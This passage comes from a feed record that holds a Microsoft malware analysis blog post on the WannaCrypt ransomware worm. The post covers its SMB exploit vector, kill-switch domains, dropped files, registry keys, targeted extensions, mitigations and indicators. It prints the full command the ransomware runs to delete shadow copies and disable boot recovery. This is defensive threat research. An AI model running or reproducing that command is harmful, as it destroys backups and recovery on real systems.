.mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. The vicious infection cycle continues as the scanning routing discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "51bb28bfd48664f7123e2bd0496cb5e4e7486f18ac8f563d47dac1047f115f8f", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "7ffd9eda0c71ce3b65053213385512d5", "key": "href"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "69654611badaced3e365c04618737412", "key": "title"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "e8ece5e56bdd3732ba7cab6279f9f4ba", "key": "description"}, {"hash": "2539359a3785695f4c56ccf35c614000", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "2539359a3785695f4c56ccf35c614000", "key": "published"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-05-13T06:40:39", "objectVersion": "1.5", "published": "2017-05-13T06:40:39", "references": [], "reporter": "msft-mmpc", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "viewCount": 228}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "On May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * _TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. The vicious infection cycle continues as the scanning routing discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 